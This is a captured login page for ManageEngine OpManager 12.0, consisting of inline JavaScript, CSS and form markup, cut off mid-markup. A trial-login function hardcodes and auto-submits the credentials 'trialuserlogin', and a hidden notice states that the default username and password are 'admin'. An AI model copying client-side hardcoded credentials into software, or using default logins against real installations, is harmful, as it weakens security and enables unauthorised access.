    //window.alert( 'Width = ' + screenWidth );
    //window.alert( 'Height = ' + screenHeight );
    document.loginForm.ScreenWidth.value =screenWidth;
    document.loginForm.ScreenHeight.value = screenHeight;

}

/*function getFlashVersion(){
	var version = deconcept.SWFObjectUtil.getPlayerVersion();
	var myflashversion =version['major'] +"."+ version['minor'] +"."+ version['rev'];
	if (document.getElementById && (version['major'] >= 0)) {
		createCookie("flashversionInstalled" ,myflashversion, 2);
	}
}*/

function showDiv(DivId){
	document.getElementById(DivId).style.display = 'block';
}
// function hideDiv(DivId){
// 	if(DivId == 'loginFirst'){
// 	document.getElementById('loginFirst').innerHTML ="<table width=\"373\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tr><td width=\"13\" height=\"21\"><img src=\"/webclient/common/images/spacer.gif\" alt=\" \" /></td><td  width=\"339\"></td><td width=\"21\" height=\"21\"><a href=\"javascript:hideDiv('loginFirst');clearLoginInfo();\"><img src=\"/webclient/common/images/spacer.gif\" border=\"0\" title=\"close\" /></a></td></tr></table>"
// 	}else{
// 		document.getElementById(DivId).style.display = 'none';
// 	}
// }
// function forgetPass(){
// 	hideDiv('authenticationDiv'); //No I18N
// 	//hideDiv('loginFirst');
// 	//document.loginForm.uname.focus();
// }
 function skipOption()
{            
    document.loginForm.userName.value = "trialuserlogin";//No I18N
    document.loginForm.password.value = "trialuserlogin";//No I18N
	//document.loginForm.domainName.value = "NULL";//no i18n
	//document.loginForm.authType.value = "localUserLogin";//no i18n
    loginSubmit();
}
function setOpacityInputUser()
{
    document.getElementById('userName').setAttribute("class","loginFont usrNameField opacity8");

}
function setOpacity3InputUser()
{
    document.getElementById('userName').setAttribute("class","loginFont usrNameField opacity3");

}
function setOpacityInputEmail()
{
    document.getElementById('uname').setAttribute("class","loginFont usrNameField opacity8");

}
function setOpacity3InputEmail()
{
    document.getElementById('uname').setAttribute("class","loginFont usrNameField opacity3");

}
function setOpacityInputPwd()
{
     document.getElementById('password').setAttribute("class","loginFont pwdField opacity8");
     document.getElementById('password').type = 'password';

}
function setOpacity3InputPwd()
{
     document.getElementById('password').setAttribute("class","loginFont pwdField opacity3");
     document.getElementById('password').type = 'text';

}
function trimAll(str)
{
        /*************************************************************
        Input Parameter :str
        Purpose         : remove all white spaces in front and back of string
        Return          : str without white spaces
        ***************************************************************/

        //check for all spaces
        var objRegExp =/^(\s*)$/;
        if (objRegExp.test(str))
        {
                str = str.replace(objRegExp,'');
                if (str.length == 0)
               { return str;}
        }

        // check for leading and trailling spaces
        objRegExp = /^(\s*)([\W\w]*)(\b\s*$)/;
        if(objRegExp.test(str))
        {
                str = str.replace(objRegExp, '$2');
        }
        return str;
}
</script>

<link href="/apiclient/fluidicv2/styles/css/commonstyles.css" rel="stylesheet" type="text/css" >
<script type='text/javascript' src='/apiclient/fluidicv2/javascript/plugins/select2.min.js'></script>
<link rel='stylesheet' type='text/css' href='/apiclient/fluidicv2/styles/css/plugins/select2.min.css' />







<style>

/* <---------- login page styles starts */
@font-face{font-family:'LatoBold';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/Lato-Bold.ttf') format('truetype');font-weight:normal;font-style:normal}
@font-face{font-family:'LatoLight';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/Lato-Light.ttf') format('truetype');font-weight:normal;font-style:normal}
@font-face{font-family:'LatoRegular';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/Lato-Regular.ttf') format('truetype');font-weight:normal;font-style:normal}
@font-face{font-family:'RobotoSlabThin';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/RobotoSlab-Thin.ttf') format('truetype');font-weight:normal;font-style:normal}
@font-face{font-family:'RobotoSlabLight';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/RobotoSlab-Light.ttf') format('truetype');font-weight:normal;font-style:normal}
@font-face{font-family:'RobotoSlabRegular';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/RobotoSlab-Regular.ttf') format('truetype');font-weight:normal;font-style:normal}

*{box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;-webkit-tap-highlight-color:rgba(0,0,0,0);outline:none}
html,body{width:100%;height:100%;position:relative;overflow:hidden}
body{background:url(/apiclient/fluidicv2/img/login/login-bg.png) repeat 100%/25%}
#LoginDiv{width:100%;height:100%;padding:0;margin:0;position:absolute;top:0;left:0}
#LoginDiv:before{background:#fff;width:450px;height:450px;content:'';margin:auto;border-radius:50%;box-shadow:0 15px 61px 5px rgba(0,0,0,.2);-ms-box-shadow:0 15px 61px 5px rgba(0,0,0,.2);-moz-box-shadow:0 15px 61px 5px rgba(0,0,0,.2);-webkit-box-shadow:0 15px 61px 5px rgba(0,0,0,.2);-o-box-shadow:0 15px 61px 5px rgba(0,0,0,.2);position:absolute;top:0;right:0;bottom:0;left:0;display:block;z-index:1}
/*#LoginDiv:after{background:url(/apiclient/fluidicv2/img/login/noise-bg.png) no-repeat;width:100%;height:100%;content:'';margin:auto;position:absolute;top:0right:0;bottom:0;left:0;background-size:cover;-moz-background-size:cover;-webkit-background-size:cover;-o-background-size:cover;opacity:0.5}*/
#opmLogin{float:left;width:450px;height:450px;text-align:center;color:#fff;padding:0 30px;margin:auto;position:absolute;top:0;right:0;bottom:0;left:0;z-index:2}
#opmLogin h2{width:100%;font:35px RobotoSlabThin;color:#7e909d;position:absolute;top:22px;left:0;z-index:1}
#opmLogin h2 span{background:#65cfe6;font-size:12px;color:#d2faff;padding:2px 5px;margin:0 0 0 5px;border-radius:5px;position:absolute;bottom:5px;display:none}
#opmLogin .info{width:100%;font:45px RobotoSlabThin;position:absolute;top:-100px;left:0;display:none}
#opmLogin .loginField{width:450px;height:450px;margin:auto;position:absolute;top:0;left:0;transition:all .3s ease;-ms-transition:all .3s ease;-moz-transition:all .3s ease;-webkit-transition:all .3s ease;-o-transition:all .3s ease;display:block !important}
#opmLogin .inputField{float:left;width:100%;text-align:center;padding:80px 30px 30px;margin:auto}
#opmLogin .inputFieldRow{width:100%;height:100%;margin:auto}
#opmLogin .inputFieldRow.inputFieldCol-2{width:66.6666666%}
#opmLogin .inputFieldCol{float:left;width:100%;text-align:left;padding:0 50px;margin:50px 0 11px}
#opmLogin .inputFieldCol > div:first-child{width:100%;margin:0 0 10px;border-bottom:1px solid #898989;position:relative}
#opmLogin .inputFieldCol > div:first-child:before,#opmLogin .inputFieldCol > div:first-child:after{background:#898989;width:1px;height:5px;content:'';display:block;position:absolute;bottom:0;left:0}
#opmLogin .inputFieldCol > div:first-child:after{right:0;left:auto}
#opmLogin .inputFieldCol input[type=text],#opmLogin .inputFieldCol input[type=password]{width:100%;font:18px RobotoSlabLight;text-align:center;color:#000;padding:5px 12px;border:0}
#opmLogin .inputFieldCol .selBox > span{background:none;min-width:200px;width:100% !important}
#opmLogin .inputFieldCol .selBox > span .select2-selection__rendered{font:18px LatoLight;color:#ababab}
#opmLogin .inputFieldCol .selBox > span.select2-container--focus .select2-selection__rendered,#opmLogin .inputFieldCol .selBox > span.select2-container--open .select2-selection__rendered{color:#898989}
#opmLogin .inputFieldCol .selBox > span .select2-selection{background:none;border:0}
#LoginDiv .select2-container .select2-dropdown{font:18px LatoLight;border-color:#898989}
#opmLogin .inputFieldCol > span{float:left;font:14px LatoLight;color:#898989;cursor:pointer}
#opmLogin .inputFieldCol > span + span{float:right}
#opmLogin .inputFieldCol > span:hover,#opmLogin .inputFieldCol .opmCheckBox:hover{color:#000}
#opmLogin .inputFieldCol .opmCheckBox{float:left;color:#898989}
#opmLogin .inputFieldCol .opmCheckBox div{float:left;min-width:35px;height:20px;font:12px LatoRegular;padding:0 0 0 27px;cursor:pointer;position:relative}
#opmLogin .inputFieldCol .opmCheckBox input{width:100%;height:100%;margin:0;opacity:0;filter:alpha(opcity=0);position:absolute;top:0;left:0;z-index:2;cursor:pointer}
#opmLogin .inputFieldCol .opmCheckBox div label{font:14px/15px LatoLight;z-index:0}
#opmLogin .inputFieldCol .opmCheckBox + span{float:right}
@keyframes check2{ 0%{width:0;height:0} 25%{width:4px;height:0} 50%{width:4px;height:9px} }
@-ms-keyframes check2{ 0%{width:0;height:0} 25%{width:4px;height:0} 50%{width:4px;height:9px} }
@-moz-keyframes check2{ 0%{width:0;height:0} 25%{width:4px;height:0} 50%{width:4px;height:9px} }
@-webkit-keyframes check2{ 0%{width:0;height:0} 25%{width:4px;height:0} 50%{width:4px;height:9px} }
#opmLogin .inputFieldCol .opmCheckBox div label:before{background:#fff;width:15px;height:15px;content:'';border:1px solid #898989;position:absolute;top:0;left:0}
#opmLogin .inputFieldCol .opmCheckBox div label:after{width:4px;height:9px;content:'';border:2px solid transparent;border-bottom:0;border-left:0;position:absolute;top:9px;left:3px;transform:scaleX(-1) rotate(135deg);-ms-transform:scaleX(-1) rotate(135deg);-moz-transform:scaleX(-1) rotate(135deg);-webkit-transform:scaleX(-1) rotate(135deg);transform-origin:left top;-ms-transform-origin:left top;-moz-transform-origin:left top;-webkit-transform-origin:left top;z-index:1}
#opmLogin .inputFieldCol .opmCheckBox input:checked + label:after{border-color:#42be7f;animation:check2 .3s;-ms-animation:check2 .3s;-moz-animation:check2 .3s;-webkit-animation:check2 .3s;-o-animation:check2 .3s}
#opmLogin .logInBtn{background:#e2385f;width:120px;height:auto;font:18px RobotoSlabLight;color:#fff;padding:5px 30px;margin:-6px auto 0;border:0;border-radius:4px;cursor:pointer}
#opmLogin .sendBtn{background:#e2385f;width:120px;height:auto;font:18px RobotoSlabLight;color:#fff;padding:5px 30px;margin:90px auto 0;border:0;border-radius:4px;cursor:pointer}
#opmLogin .loginInfoMsg{width:100%;font:14px LatoRegular;text-align:center;color:#000;position:absolute;right:0;bottom:115px;left:0}
#opmLogin #loginFirst span:first-child{color:#df454e}
#opmLogin #errorDiv{color:#39b54a}
#opmLogin #errorMsg,#opmLogin #forgotPassStatus{color:#ff0000}
.copyRights{width:100%;font:12px RobotoSlabLight;color:#fff;text-align:center;position:fixed;bottom:20px;left:0}
.copyRights span{background:#000;color:#fff;padding:4px 20px 5px 20px;border-radius:4px;display:inline-block}
.opmIconsHolder{width:450px;height:450px;margin:auto;border-radius:50%;position:absolute;top:0;right:0;bottom:0;left:0;transform: scale(0.95);z-index:0}
.opmIcons{width:1px;height:1px;position:absolute}
.opmIcons:before{background:#f5f5f7;width:1px;content:'';position:absolute;display:inline-block}
.opmIcons > div{width:100px;height:100px;border:2px solid #f5f5f7;border-radius:50%;position:absolute}
.opmIcons > div:before{background:#f5f5f7;width:1px;content:'';position:absolute;display:inline-block}
.opmIcons > div:after{background-image:url(/apiclient/fluidicv2/img/opm-login-sprites.png);background-repeat:no-repeat;content:'';margin:auto;position:absolute;top:0;right:0;bottom:0;left:0;display:inline-block;transform:scale(.6)}
.opmIcons.reportsMaps{top:-20px;right:20px}
.opmIcons.reportsMaps:before{height:52px;top:47px;left:-27px;transform:rotate(45deg)}
.opmIcons-reports{top:-110px;left:-80px}
.opmIcons-reports:before{height:69px;top:95px;left:63px;transform:rotate(-10deg)}
.opmIcons-reports:after{background-position:0 0;width:53px;height:49px}
.opmIcons-maps{top:-130px;left:70px}
.opmIcons-maps:before{height:139px;top:64px;left:-33px;transform:rotate(44deg)}
.opmIcons-maps:after{background-position:-54px 0;width:50px;height:67px}
.opmIcons.network{top:10px;right:-80px}
.opmIcons-network:before{height:119px;top:40px;left:-47px;transform:rotate(64deg)}
.opmIcons-network:after{background-position:-104px 0;width:67px;height:67px}
.opmIcons.inventory{top:110px;right:-280px}
.opmIcons-inventory:before{height:284px;top:-86px;left:-142px;transform:rotate(90deg)}
.opmIcons-inventory:after{background-position:-171px 0;width:55px;height:38px}
.opmIcons.workflowServer{top:190px;right:-270px}
.opmIcons.workflowServer:before{height:212px;top:-69px;left:-153px;transform:rotate(90deg)}
.opmIcons-workflow{top:100px;left:-130px}
.opmIcons-workflow:before{height:70px;top:-67px;left:70px;transform:rotate(16deg)}
.opmIcons-workflow:after{background-position:-227px 0;width:71px;height:65px}
.opmIcons-server{top:125px;left:54px}
.opmIcons-server:before{height:157px;top:-116px;left:-46px;transform:rotate(-48deg)}
.opmIcons-server:after{background-position:-299px 0;width:37px;height:47px}
.opmIcons.people{top:430px;right:-41px}
.opmIcons-people:before{height:186px;top:-165px;left:-29px;transform:rotate(-34deg)}
.opmIcons-people:after{background-position:-338px 0;width:99px;height:45px}
.opmIcons.dashboard{top:482px;right:219px}
.opmIcons.dashboard:before{height:20px;top:-77px;left:153px;transform:rotate(-35deg)}
.opmIcons-dashboard{top:10px;right:-120px}
.opmIcons-dashboard:before{height:100px;top:-81px;left:106px;transform:rotate(-143deg)}
.opmIcons-dashboard:after{background-position:0 -69px;width:61px;height:61px}
.opmIconsLeft{transform:translate(0,440px) rotate(-180deg)}
.opmIconsLeft .opmIcons-reports:after{background-position:-62px -69px;width:52px;height:52px;transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons-maps:after{background-position:-115px -69px;width:59px;height:62px;transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons-network:after{background-position:-175px -62px;width:66px;height:68px;transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons-inventory:after{background-position:-242px -66px;width:77px;height:79px;transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons-workflow:after{background-position:-320px -48px;width:58px;height:76px;transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons-server:after{background-position:-379px -45px;width:60px;height:54px;transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons-people:after{background-position:-380px -101px;width:70px;height:58px;transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons.dashboard{top:482px;right:240px}
.opmIconsLeft .opmIcons-dashboard:after{transform:rotate(180deg) scale(0.6)}
.opmIconsLeft .opmIcons.reportsMaps:before{height:87px;top:24px;left:-50px;transform:rotate(73deg)}
.opmIconsLeft .opmIcons.reportsMaps{top:-20px;right:-40px}
.opmIconsRight .opmIcons-dashboard{top:-11px;right:-120px}
.opmIconsRight .opmIcons.dashboard:before{height:26px;top:-105px;left:21px;transform:rotate(-76deg)}
.opmIconsRight .opmIcons-dashboard:before{height:87px;top:-84px;left:27px;transform:rotate(-203deg)}
.opmIconsRight .opmIcons.dashboard{top:481px;right:61px}
.opmIconsRight .opmIcons.people{top:490px;right:-121px}
.opmIconsRight .opmIcons-people:before{height:199px;top:-138px;left:-72px;transform:rotate(-52deg)}
.opmIconsRight .opmIcons-workflow{top:120px;left:-180px}
.opmIconsRight .opmIcons-workflow:before{height:104px;top:-42px;left:-47px;transform:rotate(110deg)}
#opmLogin #forgotPasswordDiv .inputField{padding:140px 30px 30px}
#opmLogin #forgotPasswordDiv{left:100%}
.opmLoginFieldHolder{width:450px;height:450px;margin:auto;border-radius:50%;position:absolute;top:0;right:0;bottom:0;left:0;overflow:hidden}
#LoginDiv.domainField:before{width:500px;height:500px}
#LoginDiv.domainField .opmIconsHolder,#LoginDiv.domainField #opmLogin{width:500px;height:500px}
#LoginDiv.domainField  .loginField{width:100%;height:100%}
#LoginDiv.domainField #opmLogin h2{top:24px}
#LoginDiv.domainField #authenticationDiv .inputFieldCol{padding:0 30px;margin:20px 0 10px}
#LoginDiv.domainField #authenticationDiv .logInBtn{margin:6px auto 0}
#LoginDiv.domainField #forgotPasswordDiv .inputFieldCol{padding:0 30px}
#LoginDiv.domainField #forgotPasswordDiv .sendBtn{margin:123px auto 0}
#LoginDiv.domainField .opmIcons.dashboard:before{height:20px;top:-51px;left:152px;transform:rotate(-35deg)}
#LoginDiv.domainField .opmIcons-dashboard:before{height:80px;top:-56px;left:108px;transform:rotate(-136deg)}
#LoginDiv.domainField .opmIcons.dashboard{top:518px;right:260px}
#LoginDiv.domainField .opmIconsRight .opmIcons.dashboard{top:481px !important;right:61px !important}
#LoginDiv.domainField .opmIconsRight .opmIcons.dashboard:before{height:64px;top:-51px;left:12px;transform:rotate(-50deg)}
#LoginDiv.domainField .opmIconsRight .opmIcons-dashboard:before{height:0}
#LoginDiv.domainField .opmIconsLeft .opmIcons.dashboard{top:465px}
#LoginDiv.domainField .loginInfoMsg{width:100%;font:14px LatoRegular;text-align:center;color:#000;position:absolute;right:0;bottom:120px;left:0}
#opmLogin h2.ncmLoginTxt{font-size:30px}
#opmLogin h2.nfaLoginTxt{font-size:30px;top:32px}
.opmLoginSkip{font:12px LatoLight;color:#ababab;margin:10px 0 0}
.opmLoginSkip i{font-style:normal}
.opmLoginSkip div{display:inline-block;cursor:pointer}
.opmLoginSkip div:hover{color:#898989}

.loginCredentialInfo{background:#fdf79f;color:#000 !important;padding:3px 8px;margin:0 0 -6px;border-radius:4px;position:relative}

.circle{background:radial-gradient(ellipse at center, rgba(255,255,255,.3) 0%, rgba(0,0,0,.1) 100%);background: -moz-radial-gradient(center, ellipse cover, rgba(255,255,255,.3) 0%, rgba(0,0,0,.1) 100%);background:-webkit-radial-gradient(center, ellipse cover, rgba(255,255,255,.3) 0%, rgba(0,0,0,.1) 100%);background: -o-radial-gradient(center, ellipse cover, rgba(255,255,255,.3) 0%, rgba(0,0,0,.1) 100%);background: -ms-radial-gradient(center, ellipse cover, rgba(255,255,255,.3) 0%, rgba(0,0,0,.1) 100%);filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ffffff', endColorstr='#000000',GradientType=1 );width:100%;height:100%;margin:auto;position:absolute;top:0;right:0;bottom:0;left:0}

.appDownloadBtn{width:300px;height:25px;text-align:center;margin:auto;position:absolute;right:0;bottom:-67px;left:0}
.appDownloadBtn a{background:url(/apiclient/fluidicv2/img/opm-login-sprites.png) no-repeat 0 0;width:90px;height:25px;margin:0 3px;display:inline-block}
.appDownloadBtn a.icon-iphone{background-position:0 -160px}
.appDownloadBtn a.icon-ipad{background-position:-91px -160px}
.appDownloadBtn a.icon-android{background-position:-182px -160px}
.eventbanner{max-width:1230px;margin:auto;position:fixed;top:0;right:20px;left:20px;z-index:1}
.eventbanner a{float:left;width:100%}
.eventbanner img{width:100%;height:auto}
.eventContent{background:#000;float:left;width:100%;height:auto;font:14px LatoRegular;color:#fff;padding:20px}
.eventContent a{float:none;width:auto;color:#31A5F0;text-decoration:none;display:inline}
.eventContent a:hover{text-decoration:underline}
.opm-closeAd{background:#fa5b5a;width:26px;height:26px;border-radius:50%;display:inline-block;position:absolute;top:3px;right:3px;cursor:pointer;transition:all .3s ease;-ms-transition:all .3s ease;-moz-transition:all .3s ease;-webkit-transition:all .3s ease;-o-transition:all .3s ease}
.opm-closeAd:before,.opm-closeAd:after{background:#fff;width:1px;height:14px;content:'';margin:auto;display:block;position:absolute;top:0;right:0;bottom:0;left:0;transform:rotate(45deg)}
.opm-closeAd:after{transform:rotate(135deg)}

.loginBgCustomized .opmIconsHolder,.loginBgCustomized .appDownloadBtn{display:none}

@media only screen and (max-height:939px){
.opmIconsHolder{transform:scale(.9)}
#LoginDiv,.eventbanner{transform:scale(.95)}
#opmLogin .inputFieldCol > span,.opmLoginSkip{font-size:14px}
#opmLogin .inputFieldCol .opmCheckBox div label{font:14px/15px LatoLight}
body.MacOS #LoginDiv,body.MacOS .eventbanner{transform:scale(.8)}
}
@media only screen and (max-height:700px){
body:not(.loginBgCustomized) #LoginDiv{transform:scale(.8)}
}

.ie-compatibility{background:#fff;text-align:center;position:absolute;top:0;right:0;bottom:0;left:0;overflow:auto}
.ie-compatibility .settingsContent{width:870px;text-align:left;margin:50px auto;display:inline-block}
.ie-compatibility .settingsContent .header,.ie-compatibility .content{float:left;width:100%;height:auto}
.opm-logo{width:213px;height:79px;display:block}
h2{font:23px RobotoSlabLight;color:#f90505;margin:15px 0 15px}
.ie-compatibility .content > div{background:#fff;float:left;width:100%;padding:25px;margin:12px 0;border:1px solid #eaeaea;border-radius:3px;box-shadow:0 1px 4px 0 rgba(0,0,0,.1)}
h4{font:16px LatoBold;color:#4e4e4e;margin:0 0 8px;position:relative}
h4 .info{font:16px LatoRegular;color:#696969}
ul{list-style:disc inside}
li{font:16px/25px LatoRegular;color:#696969}
.part1,.part2{min-height:90px;padding:40px 25px 25px 180px !important;position:relative}
body.ie7 .part1,body.ie7 .part2{width:845px !important}
.part1{padding:40px 25px 25px 80px !important}
.part1 img,.part2 img{display:block;position:absolute;top:30px;left:45px}
.part2 h4{font:35px RobotoSlabThin;color:#1876d7}
.part2 li{line-height:33px}
.part3{padding:40px 25px 40px 55px !important}
.part3 h4{margin:0 0 30px}
.part3 > div{float:left;padding:20px 0 0 50px;margin:0 100px 0 0;position:relative;display:inline-block}
.part3 img{width:33px;height:34px;display:block;position:absolute;top:0;left:0}
.part3 > div.unable2StartEmail img{background-position:-277px -791px;width:42px;height:42px}
.part3 > div > *{display:block}
.part3 > div > b{font:14px LatoBold;color:#545454;position:absolute;top:0;left:50px}
.part3 > div > span{font:16px LatoRegular;color:#4e4e4e}
.part3 > div.unable2StartEmail b{top:2px}
.part3 > div.unable2StartEmail{padding:22px 0 0 50px}
.part3 > div.unable2StartEmail > span{color:#2f45a6}
.ie_issue,.ie_solution{position:absolute !important;top:0 !important;left:-30px !important}

#LoginDiv.showErrorMs #opmLogin h2{margin:30px 0 15px}
#LoginDiv.showErrorMs #opmLogin .inputField {padding:95px 30px 30px}
#LoginDiv.showErrorMs #opmLogin .inputFieldCol{margin:25px 0 0px}
#LoginDiv.showErrorMs #opmLogin .logInBtn{margin:65px auto 0}
#LoginDiv.showErrorMs #opmLogin .loginInfoMsg{width:70%;left:15%}
#LoginDiv.showErrorMs.domainField h2{margin:30px 0 15px}
#LoginDiv.showErrorMs.domainField .inputField {padding:70px 30px 30px}
#LoginDiv.showErrorMs.domainField .inputFieldCol{margin:20px 0 0px}
#LoginDiv.showErrorMs.domainField .logInBtn{margin:36px auto 0}
#LoginDiv.showErrorMs.domainField .loginInfoMsg{width:70%;left:15%;bottom:100px}
#LoginDiv.showErrorMs.domainField #opmLogin .inputField {padding:70px 30px 30px}
#LoginDiv.showErrorMs.domainField .loginInfoMsg{width:70%;left:15%;bottom:115px}
#LoginDiv.showErrorMs.domainField #authenticationDiv .logInBtn{margin:40px auto 0}
/* login page styles ends ----------> */
</style>
</head>

<script>

function closeAdBanner()
{    
    if(loginAdID!==undefined){
        $.ajax({        
            url:  "/servlets/SettingsServlet?DISABLE_CURRENT_AD="+loginAdID+"&sid="+Math.random(),//No I18N
            type: "POST",//No I18N        
            dataType: "html",//No I18N        
            success: function(response){
                $('.eventbanner').hide();
            }
        });
    }
}
function redirectAdBanner()
{
    if(hyperLink!=undefined){
	window.open(hyperLink,'_blank');
    }	
}
function loadAdBanner(userCountryName)
{
    var url = "/servlets/SettingsServlet?"; //No I18N
    var dataParams="GetLoginAd="+userCountryName+"&cookieUpdate=true&cookieName=CountryName&cookieValue="+userCountryName+"&cookieExpiry=30"; //No I18N
    $.ajax({
        url: url,
        type: "POST",//No I18N
        dataType: 'json',//No I18N
        async: true,
        data:dataParams,
        success: function(jsonData)
        {
            adPath=jsonData.adPath;
            adText=jsonData.adText;
            hyperLink=jsonData.hyperLink;
            loginAdID=jsonData.loginAdID;
            if(adPath!==undefined){
                 $("#adImageDiv").show();
                 $("#adImagePath").attr("src",adPath); //No I18N
            }else if(adText!==undefined){
                $("#adTextDiv").show();
                $("#adTextDiv .eventContent").text(adText);
            }
        }
    });
            
}
function checkLoginCustomized()
{
	var loginBgValue = "false";
	if(loginBgValue!=="null" && loginBgValue!=="false")
	{
		$('body').addClass('loginBgCustomized');
		if(loginBgValue === "customColor")
		{
			$('body').css({'background':'#'});//No I18N
		}
		else
		{
			$('body').css({'background':"url(/apiclient/fluidicv2/img/login/login-bg.png?"+Math.random()+") no-repeat center/100%"});//No I18N
		}
	}
	var showCopyRight = "on";
	if(showCopyRight==="off"){
		$(".copyRights").css({'display':'none'});//No I18N
	}	
}
</script>
<!--body class="loginBody1" onload="javascript:loadCredentialsFromCookie(); userType();"-->
<body>

<!--Start Login Main Div-->
<form id="form1" name="loginForm" METHOD=post action='j_security_check;jsessionid=E3F79E8675738CB73D8F6F346C24B664' autocomplete="off" onSubmit="return loginSubmit();" >
<input id="authRuleName" type="hidden" name="AUTHRULE_NAME" value="Authenticator"/>
<input type="hidden" name="clienttype" value="html">


<input type="hidden" name="ScreenWidth">
<input type="hidden" name="ScreenHeight">
<input type="hidden" name="loginFromCookieData">
<input type="hidden" id="ntlmv2" name="ntlmv2" value="false">
<input type="hidden" id="domainNameDiv">
<!--Start Login Box-->					
<div class='circle'></div>
        <div class='eventbanner' id='adImageDiv' style='display:none'>
            <a onclick="redirectAdBanner()" target="_blank" style="cursor:pointer;"><img id='adImagePath' src='' alt='banner'></a>
            <i class='opm-closeAd' onclick='closeAdBanner();'></i>
        </div>
        <div class='eventbanner' id='adTextDiv'  style='display:none'>
            <div onclick="redirectAdBanner()" class='eventContent' style="cursor:pointer;"></div>
            <i class='opm-closeAd' onclick='closeAdBanner();'></i>
        </div>
        
        <script>
        var userCountryName="ALL"; //No I18N
        var $zoho=$zoho || {};
        $zoho.salesiq = $zoho.salesiq || {widgetcode:"dfffdb755e785782bec7a76eb4ff95bd57c72617aa8faf11cd82ea2cc4884740",values:{}, //No I18N
           ready:function(embedinfo)
           {
           $zoho.salesiq.floatbutton.visible("hide");  //No I18N 
           $zoho.salesiq.visitor.getGeoDetails();  
           }
           };
        var d=document;
        s=d.createElement("script");
        s.type="text/javascript";
        s.id="zsiqscript";
        s.defer=true;
        s.src="https://salesiq.zoho.com/widget";
        t=d.getElementsByTagName("script")[0];
        t.parentNode.insertBefore(s,t);
        d.write("<div id='zsiqwidget'></div>");   
        $zoho.salesiq.afterReady = function(info) { 
               userCountryName=info.Country;
               loadAdBanner(userCountryName);
        }  
        </script>
        

<div id="LoginDiv">
	<div class='opmIconsHolder'>
		<div class='opmIconsRight'>
			<div class='opmIcons reportsMaps'>
				<div class='opmIcons-reports'></div>
				<div class='opmIcons-maps'></div>
			</div>
			<div class='opmIcons network'>
				<div class='opmIcons-network'></div>
			</div>
			<div class='opmIcons inventory'>
				<div class='opmIcons-inventory'></div>
			</div>
			<div class='opmIcons workflowServer'>
				<div class='opmIcons-workflow'></div>
				<div class='opmIcons-server'></div>
			</div>
			<div class='opmIcons people'>
				<div class='opmIcons-people'></div>
			</div>
			<div class='opmIcons dashboard'>
				<div class='opmIcons-dashboard'></div>
			</div>
		</div>
		<div class='opmIconsLeft'>
			<div class='opmIcons reportsMaps'>
				<div class='opmIcons-reports'></div>
				<div class='opmIcons-maps'></div>
			</div>
			<div class='opmIcons network'>
				<div class='opmIcons-network'></div>
			</div>
			<div class='opmIcons inventory'>
				<div class='opmIcons-inventory'></div>
			</div>
			<div class='opmIcons workflowServer'>
				<div class='opmIcons-workflow'></div>
				<div class='opmIcons-server'></div>
			</div>
			<div class='opmIcons people'>
				<div class='opmIcons-people'></div>
			</div>
			<div class='opmIcons dashboard'>
				<div class='opmIcons-dashboard'></div>
			</div>
		</div>
	</div>
	<div id='opmLogin'>
		
		
		
		
		
			<h2>OpManager<span>v 12.0</span></h2>
		
		
		<div class='info'>The Complete Network Monitoring Software</div>
		<div class='opmLoginFieldHolder'>
			<!--Start authenticationDiv Box-->
			<div class='loginField' id="authenticationDiv" style='display:block;'>
				<div class='inputField'>
					<div class='inputFieldRow opmLoginField'>
					
						
						
							<div class='inputFieldCol'>
						
					
						
							
							
							
								<div><input type='text' name='j_username' placeholder='User Name' id='userName' tabindex='1' /></div>
							
							
							 
							<span>&nbsp;</span>
						</div>
						<div class='inputFieldCol'>
							
							
							
							
								<div><input  id="password" type="password" placeholder='Password' name='j_password'  tabindex='1'/></div>
							
							

							<div class='opmCheckBox'>
								<div>
									<input name="signInAutomatically" id="StayIn" type="checkbox">
									<label>Keep me signed in</label>
								</div>
							</div>
							<span onclick="javascript:showForgotPassword(),forgetPass();" >Forgot Password</span>
						</div>

						
						
						
					</div>
				</div>
				<input id="btnSubmit"  type="submit" class="logInBtn" value="Login">

				 
			</div>
			<!--End authenticationDiv Box-->
			<div class='loginField forgotPasswordField' id="forgotPasswordDiv" style='display:none;'>
				<div class='inputField'>
					<div class='inputFieldRow'>
						<div class='inputFieldCol'>
							<div>
								<input name="uname" id="uname" placeholder='User Name' type="text"  class="loginFont pwdField" tabindex='-1'/>
							</div>
							<span  onclick="javascript:returnLogin();" >Back to Login</span>
						</div>
						
							
							
								<input id="btnSubmit"  type="button" class="sendBtn" value="Send" onclick="javascript:generatePwd();" tabindex='-1'>
							
						
				    </div>
				</div>
			</div>
		</div>
		<div class='loginInfoMsg'>

			
			<div style="display:none;" id="loginFirst">
				<span>Note - &nbsp; </span>	<span>User Name & Password  : admin <span>
			</div>
			

			<div id="forgotPassStatus">
				
			</div>
			<div id="mailErrorDiv" ></div>
			<div id="ie6_statusmsg">
				webclient.common.login.ie webclient.common.login.version
			</div>
			

		</div>
		<div class='appDownloadBtn'>
			
				
				
				
					<a href='https://itunes.apple.com/in/app/opmanager/id561926637?mt=8' target='_blank' class='icon-iphone'></a>
					
					<a href='https://play.google.com/store/apps/details?id=com.manageengine.opm&hl=en' target='_blank' class='icon-android'></a>
				
			
		</div>
</div>
</div>
<div class='copyRights'><span>The Complete Network Monitoring Software from ManageEngine.  Copyright @ 2019 ZOHO Corp., All rights reserved.</span></div>

</form>
<script>
	checkLoginCustomized();
</script>
<div id='browserNotSupportDiv' style='display:none'>
	<div class='ie-compatibility'>
			<div class='settingsContent'>
				<div class='header'>
					<img src='/apiclient/fluidicv2/img/opmlogo.png' class='opm-logo'></img>
					<h2>Problem in loading OpManager GUI with Internet Explorer.</h2>
				</div>
				<div class='content'>
					<div class='part1'>
